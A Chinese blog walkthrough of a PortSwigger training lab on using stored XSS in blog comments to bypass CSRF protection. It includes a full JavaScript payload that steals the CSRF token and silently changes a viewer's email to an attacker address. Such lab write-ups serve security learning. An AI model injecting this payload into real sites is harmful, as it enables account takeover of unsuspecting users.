实战演练:利用XSS漏洞执行CSRF攻击

1. 选择目标站点

为了方便举例,这里我们选择portswigger默认搭建好的实验室环境。
PS:其他站点类似操作即可。

1.1 实验环境介绍

该实验室在博客评论功能中包含存储的XSS漏洞。要解决实验室问题,可利用该漏洞执行CSRF攻击,并更改查看博客帖子评论的人的电子邮件地址。
实验入口:进入网站https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf,点击【ACCESS THE LAB】即可进入实验环境。
在这里插入图片描述

2. 实战演练:利用XSS漏洞执行CSRF攻击

  1. 进入环境后可以看到本站点是一个博客,点击【My account】登录博客,可以使用以下凭据登录到自己的帐户:wiener:peter。
    在这里插入图片描述

  2. 查看登录网址源码,可以发现网站做了CSRF防御
    在这里插入图片描述

  3. 接下来需要探索目标网站是否存在XSS注入,以便获取用户csrf token执行后续攻击

    随机打开一篇文章
    在这里插入图片描述
    进入评论区,测试是否存在XSS。
    在这里插入图片描述
    通过在评论区注入代码<script>alert(1)</script>,返回博客首页后,出现弹窗,说明评论区确认存在XSS注入点。

  4. 构建XSS payload提取源码中的csrf token值,并发送修改电子邮箱的请求,受害者进入评论页面后,电子邮箱会被自动篡改。
    构建payload如下

    <script>
    	var req = new XMLHttpRequest();
    	req.onload = handleResponse;
    	req.open('get', '/my-account', true);
    	req.send();
    
    	function handleResponse() {
    		var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    		console.log(token)
    		var changeReq = new XMLHttpRequest();
    	changeReq.open('post', '/my-account/change-email', true);
    	changeReq.send('csrf='+token+'&email=attacker@163.com')
    };
    </script>
    

在这里插入图片描述
5. 再次进入这篇文章后会自动篡改邮箱,拦截的请求如下,可以看到CSRF注入生效了。
在这里插入图片描述

当然也可以利用Burp Suite专业版自带的CSRF PoC生成器自动生成一份PoC,html格式,可以直接界面点击触发。

3. 参考

[1] https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/322367.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

项目乱、管控难?低代码CRM+助力广告行业数字化运营

广告行业涉及的是多环节、多角色、把控难的复杂项目&#xff0c;传统的广告行业普遍存在客户资源分散、项目协同难、账目不清晰、数据信息滞后等问题。 基于广告行业场景痛点&#xff0c;道一云结合七巧低代码开发平台&#xff0c;打造了广告行业CRM解决方案&#xff0c;围绕销…

机器学习中的线性回归

线性回归 概念 利用 回归方程(函数) 对 一个或多个自变量(特征值)和因变量(目标值)之间 关系进行建模的一种分析方式。 分类 一元线性回归&#xff1a;y wx b 目标值只与一个因变量有关系 多元线性回归&#xff1a; y w_1x_1 w_2x_2 w_3x_3 … b 目标值只与多个…

什么是WhatsApp Business?WhatsApp和WhatsApp Business区别?

什么是WhatsApp Business&#xff1f; WhatsApp Business账号是Meta专为企业设计的WhatsApp账号。不同于消费者层次的应用&#xff0c;WhatsApp Business旨在为企业提供更好的服务支持&#xff0c;方便企业与消费者建立更好的双向沟通渠道。 WhatsApp和WhatsApp Business有什…

Vulnhub靶机:Deathnote

一、介绍 运行环境&#xff1a;Virtualbox 攻击机&#xff1a;kali&#xff08;10.0.2.15&#xff09; 靶机&#xff1a;Deathnote&#xff08;10.0.2.16&#xff09; 目标&#xff1a;获取靶机root权限和flag 靶机下载地址&#xff1a;https://www.vulnhub.com/entry/dea…

【Golang】go编程语言适合哪些项目开发?

文章目录 **前言****Go 编程语言适合哪些项目开发&#xff1f;****1. 网络编程项目&#xff1a;****2. 大数据处理项目&#xff1a;****3. 云计算项目&#xff1a;****4. Web开发项目&#xff1a;****5. 嵌入式系统项目&#xff1a;****6.API开发**:**1. 并发性能&#xff1a;*…

数字孪生+人工智能突破复杂地形和气候提供可靠的电力

利用 Bentley 应用程序实现数字化交付&#xff0c;大大缩短了项目时间和成本&#xff0c;降低了碳排放量 Kalpataru Projects International Limited (KPIL) 正在扩展喀麦隆的电力网络&#xff0c;以改善该国 13% 人口的电网连接和电力供应。根据其项目管理方法&#xff0c;KPI…

11-适配器模式(Adapter)

意图 将一个类的接口转换成客户希望的另一个接口。Adapter模式使得原本由于接口不兼容而不能在一起工作的那些类可以一起工作。 适配器模式属于结构模式。 类适配器模式&#xff08;通过继承的方式实现适配器模式&#xff09; Adapter类&#xff0c;通过继承src类&#xff0…

日处理100立方污水的污水成套设备需要哪些

对于处理100立方污水的污水成套设备&#xff0c;我们可以选择以下几种设备来完成任务。首先&#xff0c;我们需要一个污水处理设备&#xff0c;它可以帮助我们去除污水中的固体悬浮物和污染物。这个设备可以将污水中的固体物质过滤掉&#xff0c;使水变得清澈透明。同时&#x…

架构师-软件系统架构图学习总结

--- 后之视今&#xff0c;亦犹今之视昔&#xff01; 目录 早期系统架构图 早期系统架构视图 41视图解读 41架构视图缺点 现代系统架构图的指导实践 业务架构 例子 使用场景 画图技巧 客户端架构、前端架构 例子 使用场景 画图技巧 系统架构 例子 定义 使用场…

gcd得最大公约数,辗转相除法理解

欧几里得算法_百度百科 (baidu.com) —————— 百度百科证法一的一些便于理解的细节&#xff1a; 我们求 a 和 b 的最大公约数。 &#xff08;如果a是b的倍数&#xff0c;那么b就是最大公约数。&#xff09; a>b&#xff0c;a可以表示为 a kb r 设d为a和b的最大公约…

关于中考英语的一些刷题建议

怎么提高英语成绩&#xff1f; 对于英语&#xff0c;我个人认为只需要会刷题&#xff0c;多刷题就能提高&#xff0c;至于你们老师布置的关于直接背单词/语法&#xff0c;我认为提高效果并不是很明显。 为什么你从初一写到现在初三刷了这么多题&#xff0c;英语成绩还是没提高呢…

突破界限:首个国产DeepSeek MoE的高效表现

前言 在人工智能技术的快速发展过程中&#xff0c;国产首个开源MoE&#xff08;Mixture of Experts&#xff09;大模型——DeepSeek MoE的推出&#xff0c;不仅标志着中国在全球AI领域的重大突破&#xff0c;而且在计算效率和模型性能上展现了显著的优势。这款160亿参数的模型…

Python 中的字符串匹配识别文本中的相似性

更多Python学习内容&#xff1a;ipengtao.com 字符串匹配是自然语言处理&#xff08;NLP&#xff09;和文本处理中的一个重要任务&#xff0c;它可以识别文本之间的相似性、找到相同或相似的模式&#xff0c;以及进行文本分类和信息检索等应用。本文将深入探讨Python中的字符串…

D1380/D1381串行计时芯片,2.0V~5.5V 工作电流: 2V时 与TTL 兼容,采用DIP8、SOP8封装

D1380/D1381是一个带秒、分、时、日、日期、月、年的串行时钟保持芯片,每个月多少天以及闰年能自动调节, D1380/D1381低功耗工作方式, D1380/D1381用若干寄存器存储对应信息&#xff0c;一个32.768kHz 的晶振校准时钟&#xff0c;为了使用最小弓|脚&#xff0c;D1380/D1381使用…

【Java】JDBC 数据库连接 (JDK17+MySQL8)

文章目录 JDBC 是什么&#xff1f;导入JDBC jar包一、JDBC的核心API和使用路线二、基于 statement 演示 查询三、基于 statement 查询的改进与问题四、基于 preparedStatement 方式优化五、基于 preparedStatement 演示 CRUDC 、增加数据R、查询数据U、修改/更新 数据D、删除数…

抖音小店2024年创业新趋势,新手找项目,不要再错过这次的机会了

大家好&#xff0c;我是电商花花。 现在的抖音小店完全是电商创业中的一个优秀代名词和最轻便的创业项目&#xff0c;更是以独特的直播达人带货的优势将店铺激发出来。 今天给大家介绍下抖音小店的运作方式&#xff0c;并分析互联网创业的机遇&#xff0c;并提供相关的再做点…

华为交换机配置NQA DNS检测IP网络DNS解析速度

华为HCIA视频教程&#xff1a;超级实用&#xff0c;华为VRP系统文件详解 华为HCIA视频教程&#xff1a;不会传输层协议&#xff0c;HCIA都考不过 华为HCIA视频教程&#xff1a;网络工程师的基本功&#xff1a;网络地址转换NAT 华为HCIP视频教程&#xff1a;DHCP协议原理与配…

IDEA、CLion代码智能提示功能忽略大小写

代码提示和补充功能有一个特性&#xff1a;区分大小写。 如果想不区分大小写的话&#xff0c;就把这个对勾去掉。建议去掉勾选。

acwing BFS

BFS BFS 重点就是要使用 队列 进行每一层的搜索不同题目 队列中保存的元素形式都各不相同&#xff0c;并且也会用到其他辅助结构走迷宫一题&#xff0c;队列中存的是每一层(当前步能走的所有坐标)的坐标&#xff0c;并保存了每一层对应走过的步数八数码一题&#xff0c;队列中…

使用CLIP和LLM构建多模态RAG系统

在本文中我们将探讨使用开源大型语言多模态模型(Large Language Multi-Modal)构建检索增强生成(RAG)系统。本文的重点是在不依赖LangChain或LLlama index的情况下实现这一目标&#xff0c;这样可以避免更多的框架依赖。 什么是RAG 在人工智能领域&#xff0c;检索增强生成(re…